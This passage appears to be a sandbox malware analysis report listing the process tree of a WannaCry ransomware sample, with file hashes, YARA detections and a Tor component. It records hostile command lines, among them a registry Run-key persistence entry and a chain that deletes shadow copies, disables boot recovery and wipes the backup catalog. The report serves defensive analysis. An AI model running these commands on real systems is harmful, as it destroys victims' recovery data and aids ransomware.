                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:47
                                                          Start time:11:59:34
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:48
                                                          Start time:11:59:35
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:49
                                                          Start time:11:59:35
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:50
                                                          Start time:11:59:35
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:51
                                                          Start time:11:59:36
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:52
                                                          Start time:11:59:36
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:53
                                                          Start time:11:59:36
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:54
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:55
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:56
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:57
                                                          Start time:11:59:37
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:58
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:59
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe co
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: Joe Security
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Author: ReversingLabs
                                                          Antivirus matches:
                                                          • Detection: 96%, ReversingLabs
                                                          • Detection: 90%, Virustotal, Browse
                                                          Has exited:false

                                                          Target ID:60
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:61
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:62
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:63
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:64
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:65
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe vs
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:66
                                                          Start time:11:59:38
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:67
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:68
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                          Imagebase:0x190000
                                                          File size:59'392 bytes
                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:69
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:71
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:72
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:74
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:75
                                                          Start time:11:59:39
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:76
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:77
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                          Imagebase:0x960000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:78
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:79
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:80
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:81
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff701e70000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:82
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:83
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:84
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:wmic shadowcopy delete
                                                          Imagebase:0x1d0000
                                                          File size:427'008 bytes
                                                          MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:85
                                                          Start time:11:59:40
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:86
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:TaskData\Tor\taskhsvc.exe
                                                          Imagebase:0x880000
                                                          File size:3'098'624 bytes
                                                          MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          • Detection: 0%, Virustotal
                                                          Has exited:false

                                                          Target ID:87
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:88
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:89
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:90
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:91
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecdf0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:92
                                                          Start time:11:59:41
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:93
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:94
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:95
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:96
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:98
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:99
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:100
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:102
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:103
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:104
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:105
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:106
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:107
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:108
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:109
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
